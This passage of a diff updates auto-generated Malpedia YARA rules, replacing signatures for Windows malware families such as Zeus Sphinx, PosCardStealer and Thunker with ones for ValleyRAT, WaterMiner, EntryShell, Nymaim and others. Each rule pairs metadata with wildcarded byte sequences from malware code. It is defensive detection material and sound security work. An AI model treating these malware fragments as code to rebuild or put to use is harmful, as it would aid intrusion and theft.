 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.thunker_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.valley_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.valley_rat_auto.yar#L1-L164"
 		license_url = "N/A"
-		logic_hash = "8683a109f273456a365b0d0365e46b8d3a1cb330ad7cb852c208d9e170093c6d"
-		score = 75
-		quality = 75
+		logic_hash = "4fd91bc63ffea1277d480fd520807726f4547d3a7eff2043dfcadcbba2a797a7"
+		score = 60
+		quality = 45
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -145187,32 +145027,38 @@ rule MALPEDIA_Win_Thunker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7505 e9???????? ffb5fcfdffff e8???????? 68???????? 8d8500feffff }
-		$sequence_1 = { e8???????? 8d8500feffff 50 e8???????? 8d8500feffff 50 68???????? }
-		$sequence_2 = { 7417 e9???????? 3de7710000 7433 7c79 }
-		$sequence_3 = { 8d0556412600 8945fc a1???????? 8945e8 8d05a02a2600 8945dc 8365f000 }
-		$sequence_4 = { e8???????? 83c40c 09c0 750d }
-		$sequence_5 = { e8???????? 6a06 53 e8???????? 83c410 eb40 6a04 }
-		$sequence_6 = { 09c0 743b 6a00 6800100000 8d85fceeffff 50 ffb5e0edffff }
-		$sequence_7 = { c6843d00feffff00 09ff 7405 83ffff 7502 eb48 }
-		$sequence_8 = { 83c40c 8d8544edffff 50 e8???????? 8985c4edffff }
-		$sequence_9 = { 89e5 51 56 57 8b7d08 ff750c }
+		$sequence_0 = { 005c7e46 00847e46008a46 0323 d188470383ee }
+		$sequence_1 = { c785dcfbffff9b9bcc64 c785e0fbffffee6364c8 c785e4fbffff97f1dbf3 c785e8fbffff9bab9b9b c785ecfbffff25539b9b c785f0fbffff9bcdcc64 }
+		$sequence_2 = { 897e48 897e40 897e44 89464c 8d442408 }
+		$sequence_3 = { 0101 0505050505 0505050505 0505050505 0505050505 0505050505 }
+		$sequence_4 = { 51 8d93440a0000 52 e8???????? 83c40c }
+		$sequence_5 = { 0101 0101 0201 0102 }
+		$sequence_6 = { 0101 0101 0101 0101 0101 0505050505 }
+		$sequence_7 = { 0001 0101 0102 0101 }
+		$sequence_8 = { c78530feffff73cacd64 c78534feffffce97707a c78538fefffffefffee9 c7853cfefffff7f4f8f0 c78540feffff9b9b9b9b c78544feffff9b9b9b9b c78548feffff9b9b9b9b }
+		$sequence_9 = { 0101 33c0 5e 5b }
+		$sequence_10 = { 8b15???????? 6800300000 52 50 ff15???????? 8b0d???????? 51 }
+		$sequence_11 = { c785c0f6ffff8173599d c785c4f6ffff9b9bcbf3 c785c8f6ffffe384bbe4 c785ccf6ffff12dfbfab }
+		$sequence_12 = { e8???????? 8b0d???????? 83c418 890d???????? 891d???????? }
+		$sequence_13 = { 00bcaf4500c5af 45 00f8 af }
+		$sequence_14 = { c785e8f7ffffdf10dfbf c785ecf7ffffe7f1dbcd c785f0f7ffff64ebb7c8 c785f4f7ffff64cfbfa3 c785f8f7ffff10d7bfe7 c785fcf7ffff121fbf13 c78500f8ffff9b9b9b64 }
+		$sequence_15 = { 0101 33c0 8be5 5d }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 2256896
 }
-rule MALPEDIA_Win_Lightwork_Auto : FILE
+rule MALPEDIA_Win_Waterminer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d343952d-c497-57b0-a1b6-2c344677756b"
+		id = "8c2bad66-5d35-57b7-b9da-21c6dec00989"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightwork"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lightwork_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterminer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.waterminer_auto.yar#L1-L162"
 		license_url = "N/A"
-		logic_hash = "ab480be92b4f3e94b9e8b99934bd7d24840465004bb1c1ae3a81e26cd770a803"
+		logic_hash = "f10b4bcaeeaace43d5cd2141c609b5656e22416293022c0fdf8f9cf3861e271d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -145226,71 +145072,77 @@ rule MALPEDIA_Win_Lightwork_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d5001 8b4508 8990c8010000 8b4508 890424 e8???????? 8b4508 }
-		$sequence_1 = { 83e0e0 89c2 8b450c 83e01f 09d0 }
-		$sequence_2 = { c3 55 89e5 8b4508 83c011 5d c3 }
-		$sequence_3 = { e8???????? 69d0e8030000 8b450c 01d0 8945f4 8b45f4 89c2 }
-		$sequence_4 = { 8b80d8010000 8b5510 89542408 8b550c 89542404 890424 e8???????? }
-		$sequence_5 = { 7419 8b45f0 8b55f4 89442404 89542408 8b4508 890424 }
-		$sequence_6 = { 55 89e5 8b4508 0fb64005 83e0f0 89c2 8b450c }
-		$sequence_7 = { 89e5 8b4508 c74008???????? 8b4508 c740047d000000 90 5d }
-		$sequence_8 = { 890424 e8???????? 8b450c 8b4014 014518 8b5518 8b4510 }
-		$sequence_9 = { 66894819 0fb65206 88501b 8b4508 c9 c3 55 }
+		$sequence_0 = { 51 6804100020 8b5508 52 }
+		$sequence_1 = { 8b9584fdffff 0fb68208794400 ff2485f0784400 8b8decfdffff 83c904 898decfdffff }
+		$sequence_2 = { 03bc24a8000000 488bcd 4c8d0d35cb0300 83e13f }
+		$sequence_3 = { b804000000 6bc014 8b8880434b00 330d???????? 894dfc }
+		$sequence_4 = { 02d0 49ffc3 418d4001 881418 }
+		$sequence_5 = { 8d8518f5ffff 50 e8???????? 83c404 898500f7ffff e8???????? 85c0 }
+		$sequence_6 = { 0344240c 4403d0 428b4405e7 418bd2 }
+		$sequence_7 = { 03442410 4403e8 428b4405e7 418bd5 }
+		$sequence_8 = { 03c1 03d0 488d051e580500 418b0400 }
+		$sequence_9 = { 6bc903 898180434b00 68???????? 8b55fc 52 }
+		$sequence_10 = { 02c8 41880c18 418a03 240f }
+		$sequence_11 = { 8945d8 837dd806 0f8797000000 8b4dd8 ff248d54e94600 8b55f8 }
+		$sequence_12 = { 83fa78 7f19 0fbe85f3fdffff 0fbe8800ec4900 83e10f 898d28fdffff eb0a }
+		$sequence_13 = { 8945f0 817df005010000 7302 eb05 e8???????? 8b4df0 c681f82c4b0000 }
+		$sequence_14 = { 03c0 2bc8 0f84ec040000 8d41ff 8b848288d20600 }
+		$sequence_15 = { 0344240c 4403d0 488d051a560500 418b0400 }
 
 	condition:
-		7 of them and filesize < 1132544
+		7 of them and filesize < 1556480
 }
-rule MALPEDIA_Win_Unidentified_081_Auto : FILE
+rule MALPEDIA_Win_Colibri_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4bef4e35-3450-5f50-98ad-424279417112"
-		date = "2023-12-06"
-		modified = "2023-12-08"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_081"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_081_auto.yar#L1-L125"
+		id = "c5670290-4724-5847-ad87-e4a198921e3b"
+		date = "2026-01-05"
+		modified = "2026-01-06"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.colibri"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.colibri_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "0bf113d92abe743278ae5a94b3d8f7a48f5ba7f91d2e79f1d3ac361b6c786f4e"
+		logic_hash = "07fa90a8bd47a0724796f8c6b0b275796c3daebded1dd7bb4e8069ed71142d39"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20231130"
-		malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
-		malpedia_version = "20230808"
+		malpedia_rule_date = "20260105"
+		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
+		malpedia_version = "20251219"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8985c8fdffff 83f808 0f84ab090000 83f807 0f8777090000 ff24854fa44000 33c0 }
-		$sequence_1 = { c74518f0944100 50 8d4dc4 e8???????? 68???????? 8d45c4 }
-		$sequence_2 = { 68???????? b9???????? e8???????? c645fc03 33c0 }
-		$sequence_3 = { eb02 33c0 8bbdc8fdffff 6bc009 0fb6bc38e8544100 8bc7 89bdc8fdffff }
-		$sequence_4 = { 8b7508 c7465c48554100 83660800 33ff }
-		$sequence_5 = { c645fc01 33c9 66a3???????? 66390d???????? 8bc6 c705????????07000000 0f44c1 }
-		$sequence_6 = { 88440a34 8b049dd0d14100 c744023801000000 e9???????? ff15???????? 8bf8 }
-		$sequence_7 = { 83e61f c1f805 c1e606 8b0485d0d14100 80643004fd 8b45f8 }
-		$sequence_8 = { 6a01 6a00 f7d8 50 53 ff15???????? 8b8d34ffffff }
-		$sequence_9 = { ff15???????? 837c241001 7507 b101 e8???????? 8b35???????? }
+		$sequence_0 = { 8d8598fdffff 6804010000 50 6a02 59 }
+		$sequence_1 = { 50 6a02 59 e8???????? babab69c31 8bc8 }
+		$sequence_2 = { a1???????? 81ec90080000 53 56 57 8d0c4502000000 e8???????? }
+		$sequence_3 = { 59 e8???????? ba980aa4bf 8bc8 e8???????? ffd0 8945ec }
+		$sequence_4 = { 8b4dd0 8d144502000000 e8???????? a1???????? 8b4dcc 8d144502000000 e8???????? }
+		$sequence_5 = { e8???????? 53 8bf0 56 6aff 57 6a00 }
+		$sequence_6 = { 8365f800 50 e8???????? 59 85c0 7413 8b4dfc }
+		$sequence_7 = { ffd0 e8???????? 8b75d0 85c0 }
+		$sequence_8 = { 8945fc b944000000 b000 8b7dfc }
+		$sequence_9 = { 50 68e9fd0000 6a02 59 e8???????? bac0bc4316 8bc8 }
 
 	condition:
-		7 of them and filesize < 273408
+		7 of them and filesize < 51200
 }
-rule MALPEDIA_Win_Blackmagic_Auto : FILE
+rule MALPEDIA_Win_Cmsbrute_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9637b230-6b90-5402-8df5-d6a9a08385b0"
+		id = "238a708e-338b-5ab5-8256-9ba00c6b30fb"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackmagic"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.blackmagic_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmsbrute"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cmsbrute_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "0682a81f91c82180ece20284a26ec164fbede145e670a9eec1710d6febfbedfc"
+		logic_hash = "634330623f3144af6ff0dc1b30b95f2861c0e95f174875a559bba752af7efe44"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -145304,32 +145156,32 @@ rule MALPEDIA_Win_Blackmagic_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4c8d05aa2c0200 e8???????? 488bf0 4885c0 7412 488bc8 ff15???????? }
-		$sequence_1 = { 488bd7 488d8c2430010000 e8???????? 90 33d2 41b810010000 488d8c24e0010000 }
-		$sequence_2 = { 33db 49895bb8 885c2470 448d4317 488d15898a0400 498d4ba8 e8???????? }
-		$sequence_3 = { 488d4dd7 e8???????? 90 41b84d000000 488d159b810400 e8???????? 90 }
-		$sequence_4 = { 0f284587 488d154d1b0300 488d4d87 660f7f4587 e8???????? 488d5587 488d4c2440 }
-		$sequence_5 = { e8???????? 4885c0 7411 8a0e 488d1597120300 488910 884808 }
-		$sequence_6 = { 90 488d05437a0600 4889442428 488d4c2460 488d542468 488b442468 }
-		$sequence_7 = { 488b05???????? 488945d0 488b75f0 488975b8 488975d8 33c0 488985c0000000 }
-		$sequence_8 = { e8???????? 488bd8 488bc3 4883c430 415e 5f 5e }
-		$sequence_9 = { 488905???????? ff15???????? 483305???????? 488d1560360300 488bcb 488905???????? ff15???????? }
+		$sequence_0 = { f7d1 c1e91f c1e81f 22c1 8bd6 8d4eff c1e91f }
+		$sequence_1 = { ffb57cfeffff 83c01c 50 e8???????? 83c40c 85c0 7d0f }
+		$sequence_2 = { e9???????? 8b8780000000 8b7758 81c60c010000 8945d4 3bc3 7505 }
+		$sequence_3 = { ebad 85f6 7466 8b5d0c 8b03 85c0 7407 }
+		$sequence_4 = { ff0e 8b06 85c0 7f3b 7426 68ed010000 bf???????? }
+		$sequence_5 = { f645ff40 7412 8b87c0000000 3b86e0000000 0f85bbfeffff 33c0 40 }
+		$sequence_6 = { c3 80f92b 740d 80f92d 7408 84c9 74e4 }
+		$sequence_7 = { ffb7f8000000 83c620 ff76e8 c1e003 56 57 50 }
+		$sequence_8 = { ff4df4 3975dc 7461 c745f001000000 85f6 7456 ff75cc }
+		$sequence_9 = { 8b07 59 8983d8040000 e9???????? ff36 8db334040000 e9???????? }
 
 	condition:
-		7 of them and filesize < 1416192
+		7 of them and filesize < 5275648
 }
-rule MALPEDIA_Win_Webc2_Qbp_Auto : FILE
+rule MALPEDIA_Win_Mosaic_Regressor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9750d3af-ce6a-5fd6-82be-e974a57fe309"
+		id = "6545d5ce-704c-5c00-a6cd-ec1b5c909576"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_qbp"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.webc2_qbp_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mosaic_regressor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mosaic_regressor_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "29a4c00125a8c7fc3f2d53e8e3fdae1793d32ea093da5da3654341cbb647aaec"
+		logic_hash = "73c7fd14f8effd7ac9e0816b586de74eff8d0d21c8391e8e84f2921e57196fdb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -145343,32 +145195,32 @@ rule MALPEDIA_Win_Webc2_Qbp_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7f12 8b4508 0345fc 33c9 8a08 83e930 894df4 }
-		$sequence_1 = { 25ffff0000 2500800000 c1f80f 8be5 5d c3 55 }
-		$sequence_2 = { 8b5508 52 ff15???????? 8d85f0feffff 50 }
-		$sequence_3 = { 0fbf94414c520000 81fa00100000 7505 e9???????? 0fbf4508 8b4df8 }
-		$sequence_4 = { 81e1ff000000 51 8b4de4 e8???????? }
-		$sequence_5 = { aa 837d0800 7564 6800010000 6a00 8d85ecfdffff 50 }
-		$sequence_6 = { 66898c5038770000 0fbf55f0 8b45ec 668b8c50907e0000 66894df8 }
-		$sequence_7 = { 668b9176830000 668955fc 8b45f8 668b8876830000 66d1e1 8b55f8 }
-		$sequence_8 = { 66050100 668945f4 e9???????? 66c745f80000 66c745f43a01 eb18 }
-		$sequence_9 = { 0fbf5508 0fbf45fc 8b4df8 8b75f8 668b945648100000 6689944148100000 }
+		$sequence_0 = { e8???????? 670010 386700 1023 d18a0688078a }
+		$sequence_1 = { 8975e0 8db1d0a70010 8975e4 eb2a }
+		$sequence_2 = { 85c0 7456 8b4de0 8d0c8de0b70010 8901 8305????????20 }
+		$sequence_3 = { f3a4 6a1c 8d8c2480060000 51 6a00 ffd5 8d842478060000 }
+		$sequence_4 = { 8d442460 50 6a00 ffd5 8d442458 48 8d4900 }
+		$sequence_5 = { 895008 8d542458 52 88480c }
+		$sequence_6 = { c744241444000000 8bc8 90 8a10 }
+		$sequence_7 = { 6a06 89430c 8d4310 8d89c4a70010 5a }
+		$sequence_8 = { 8bff 55 8bec 8b4508 ff34c578a10010 ff15???????? 5d }
+		$sequence_9 = { 6a00 6a00 6a00 8d942498080000 }
 
 	condition:
-		7 of them and filesize < 630784
+		7 of them and filesize < 113664
 }
-rule MALPEDIA_Win_Unidentified_099_Auto : FILE
+rule MALPEDIA_Win_Rtpos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6834d9d3-6a75-5c68-b5d3-9237e184ef6d"
+		id = "48afc2d3-0fb5-53bf-8881-dc9c81c0d9e1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_099"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_099_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtpos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rtpos_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "7fd05f1e717b782bb9ac06a7756c0dc03e1b36f5a16d932168b1c5d5cda9cc3a"
+		logic_hash = "0b0f1725f7ad0b7de27494142fb6c361ef93a30e83e526a4fdbf697f28682ace"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -145382,32 +145234,32 @@ rule MALPEDIA_Win_Unidentified_099_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 48895c2408 4889742410 57 4883ec20 488d1d7e700100 }
-		$sequence_1 = { 498bcd ff15???????? b974000000 e8???????? 4c8bd0 }
-		$sequence_2 = { 488d05fb9d0000 49c1e302 4889452f 83e202 8bc2 4903c3 4c8945ef }
-		$sequence_3 = { f3aa 488d8520030000 33c9 4533c9 4889442420 4533c0 ff15???????? }
-		$sequence_4 = { 4885c0 0f8421040000 4d8bc5 488d1506950100 488d4c2450 }
-		$sequence_5 = { 7410 488d0d2cb50100 4883c428 e9???????? e8???????? 85c0 }
-		$sequence_6 = { 752c 4985df 7527 488b9540070000 4c8d0502860000 498bcd 44897604 }
-		$sequence_7 = { 41b880000000 e8???????? 4533ed 488d8d50040000 33d2 44896c2468 }
-		$sequence_8 = { 488d8c2490200000 4533c9 48897c2430 897c2428 ba00000080 c744242003000000 }
-		$sequence_9 = { 488d7f01 4883fa2d 7ce7 4c8d8510020000 }
+		$sequence_0 = { e9???????? 8b55d4 52 ff15???????? 8b45cc 50 ff15???????? }
+		$sequence_1 = { 8d8dd8fcffff 51 e8???????? 83c40c c785c4fcffff00000000 }
+		$sequence_2 = { 50 ff15???????? 8b4dcc 51 ff15???????? e9???????? 8b55ec }
+		$sequence_3 = { 8945b4 837db4ff 0f84d8010000 33c0 8945e8 8945ec }
+		$sequence_4 = { 0f84bc9f0000 ff7508 48 a3???????? }
+		$sequence_5 = { 85c0 751b 8b4dd4 51 ff15???????? }
+		$sequence_6 = { 6bf830 894df8 6a0a 8b048db86a4300 5b 8b543818 8955ec }
+		$sequence_7 = { 8b048db86a4300 f644382848 58 743a 668b55fc 663bd0 7505 }
+		$sequence_8 = { c745d800000000 837ddc00 7411 8b4ddc 51 }
+		$sequence_9 = { 6a02 8d4dfc e8???????? 8b4d08 c7410801000000 8b5108 8b049524604300 }
 
 	condition:
-		7 of them and filesize < 314368
+		7 of them and filesize < 507904
 }
-rule MALPEDIA_Win_Zeus_Sphinx_Auto : FILE
+rule MALPEDIA_Win_Entryshell_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cc60ac31-7ae9-5152-95ad-d09a0d909f1a"
+		id = "6aaf8e64-ed2e-5afd-ab35-8772e849151b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_sphinx"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zeus_sphinx_auto.yar#L1-L157"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.entryshell"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.entryshell_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "aa5ca92258dc544d26d29bb94ea2e9b532df6b20bb95794e6914a3376629593d"
+		logic_hash = "00133e95c431c2a3dcea85bea219e4bd4bbb96106a72aed7e1fb3e93342dd945"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -145421,38 +145273,32 @@ rule MALPEDIA_Win_Zeus_Sphinx_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 e8???????? 891c24 89c6 e8???????? 83c410 8d65f4 }
-		$sequence_1 = { 50 e8???????? 83c410 e8???????? 8d65f8 }
-		$sequence_2 = { 52 53 57 e8???????? ff4750 83c410 }
-		$sequence_3 = { 50 e8???????? 83c420 48 }
-		$sequence_4 = { 50 e8???????? 83c430 85c0 7e0c }
-		$sequence_5 = { 50 e8???????? 83c418 68???????? 68???????? }
-		$sequence_6 = { 50 e8???????? 84c0 745f 8d442414 }
-		$sequence_7 = { 50 e8???????? 83c414 68???????? e8???????? c70424???????? }
-		$sequence_8 = { 01fc eb98 035e14 8ade }
-		$sequence_9 = { 010d???????? 60 5a 98 }
-		$sequence_10 = { 0303 50 ff550c 8b3e }
-		$sequence_11 = { 020a 42 1af6 af }
-		$sequence_12 = { 0162c9 cf 0c06 3c3e }
-		$sequence_13 = { 003b c09bdbe23ea11c 695600663ec700 de07 }
-		$sequence_14 = { 010c02 3bf7 0f85f0f50000 e9???????? }
-		$sequence_15 = { 0008 d7 9f b2d3 }
+		$sequence_0 = { 43 895de4 8b049578512501 8945ec 897df0 8a543828 8855ff }
+		$sequence_1 = { 5d c3 8d4301 57 50 e8???????? 83c404 }
+		$sequence_2 = { 6800020000 8d85f8fdffff 50 ff36 ffd3 85c0 0f855fffffff }
+		$sequence_3 = { 6a10 e8???????? 6a40 6a00 8d45a4 50 e8???????? }
+		$sequence_4 = { 83c202 6685c0 75f5 8b8df8dfffff 2bd6 83c1fe }
+		$sequence_5 = { 60 33d2 8b55f4 33c0 8d05e4382501 33c9 8b0c90 }
+		$sequence_6 = { 0101 8d22 0131 8d22 015e8d 2201 8e8d2201558b }
+		$sequence_7 = { c705????????00400000 33c0 c3 6a08 68???????? e8???????? 833d????????01 }
+		$sequence_8 = { 8bf2 ff15???????? 85c0 7523 68???????? ff15???????? }
+		$sequence_9 = { 50 e8???????? 83c414 8d85f8f7ffff 6a00 6a00 6aff }
 
 	condition:
-		7 of them and filesize < 3268608
+		7 of them and filesize < 663552
 }
-rule MALPEDIA_Win_Poscardstealer_Auto : FILE
+rule MALPEDIA_Win_Icondown_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "53d91898-d02d-53b9-9813-59bf55e7c619"
+		id = "52465a95-defc-5467-a071-e9d8d0b66fd6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poscardstealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.poscardstealer_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icondown"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.icondown_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "8ad471a582e54a99878737b3b5b570978ce78744521ef98846f72f0bfe800fbd"
+		logic_hash = "ff2f5c555fcd472199db73f9b56f95ccfa2dde0f7fa2e7a52a938cbd42967fd9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -145466,34 +145312,34 @@ rule MALPEDIA_Win_Poscardstealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b5610 8955e4 8b4614 8945e8 897e10 897e14 837dcc10 }
-		$sequence_1 = { 6aff 6a00 50 8bce c645fc02 e8???????? 837de810 }
-		$sequence_2 = { e8???????? 83c404 397de8 0f82f6000000 }
-		$sequence_3 = { 51 e8???????? 83c420 50 8d8d74ffffff }
-		$sequence_4 = { 8901 c9 c3 3b0d???????? 7502 }
-		$sequence_5 = { 8bbd90edffff 40 898570edffff 3bc7 0f8ceffbffff 8b0d???????? }
-		$sequence_6 = { 7305 83c8ff eb08 33c0 83fe01 0f95c0 3bc7 }
-		$sequence_7 = { 8d45f4 64a300000000 8b35???????? c745fc00000000 8975ac 3b35???????? }
-		$sequence_8 = { c645fc01 e8???????? 6aff 40 50 8d559c 52 }
-		$sequence_9 = { c645fc0e e8???????? c645fc05 397de8 720c 8b4dd4 51 }
+		$sequence_0 = { ff15???????? 8b4608 8d542414 52 }
+		$sequence_1 = { 8bcf e8???????? 85c0 7415 8b4c2418 8b10 }
+		$sequence_2 = { c7466c01000000 8b4b1c 51 ff15???????? 5f 5e 5d }
+		$sequence_3 = { e8???????? 8d966c020000 52 68e9030000 57 e8???????? 8d8670020000 }
+		$sequence_4 = { 8b8690000000 8b48f8 85c9 740d 8b4e64 50 51 }
+		$sequence_5 = { 894e54 8b15???????? 895658 a1???????? 89465c 8b0d???????? }
+		$sequence_6 = { 46 f680c11c450004 741c 837d1000 }
+		$sequence_7 = { 895658 a1???????? 89465c 8b0d???????? 894e60 8b15???????? 895664 }
+		$sequence_8 = { 52 8b481c 51 ff15???????? 8b442404 6a01 }
+		$sequence_9 = { 740d 8b01 6a01 ff10 8b4e10 }
 
 	condition:
-		7 of them and filesize < 362496
+		7 of them and filesize < 5505024
 }
-rule MALPEDIA_Win_Nimrev_Auto : FILE
+rule MALPEDIA_Win_Nymaim_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "45a43e4c-b390-5a59-8f10-bde6512a2548"
+		id = "30c4b930-78a7-5077-a5dc-408a5cbb77f2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nimrev"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nimrev_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nymaim_auto.yar#L1-L209"
 		license_url = "N/A"
-		logic_hash = "cfe876922fc1333031ee5c82f8f6e15e7c6a81cc34499037bfc98c907bd66dbf"
+		logic_hash = "84775fe355e4469ac977f6fbd11fdede8794d879792df66f4d5d03f1510d45b2"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -145505,32 +145351,45 @@ rule MALPEDIA_Win_Nimrev_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8845ef eb01 90 807def00 }
-		$sequence_1 = { 0fb600 3c5f 7507 b801000000 }
-		$sequence_2 = { 3c7d 7407 b801000000 eb05 }
-		$sequence_3 = { 7507 b801000000 eb05 b800000000 8845f7 eb01 90 }
-		$sequence_4 = { 0fb600 3c7d 7407 b801000000 eb05 b800000000 }
-		$sequence_5 = { ffd0 90 e9???????? 90 b9d0070000 }
-		$sequence_6 = { c1e002 01d0 01c0 29c1 89c8 83c030 89c1 }
-		$sequence_7 = { 89c2 89d0 c1e002 01d0 01c0 29c1 89c8 }
-		$sequence_8 = { 83f001 84c0 7408 90 e8???????? eb01 }
-		$sequence_9 = { 0f9ec0 8845ef eb01 90 807def00 }
+		$sequence_0 = { 89d8 01c8 31d2 f7f7 }
+		$sequence_1 = { f7f7 92 31d2 bf64000000 }
+		$sequence_2 = { 0f94c1 09c8 6bc064 09c0 }
+		$sequence_3 = { 38f0 83d100 38d0 83d900 }
+		$sequence_4 = { 010d???????? 8b1d???????? 011d???????? c1eb13 }
+		$sequence_5 = { c1eb13 331d???????? 31c3 c1e808 }
+		$sequence_6 = { 31c3 891d???????? 89d8 01c8 }
+		$sequence_7 = { 31d2 bf64000000 f7f7 5b }
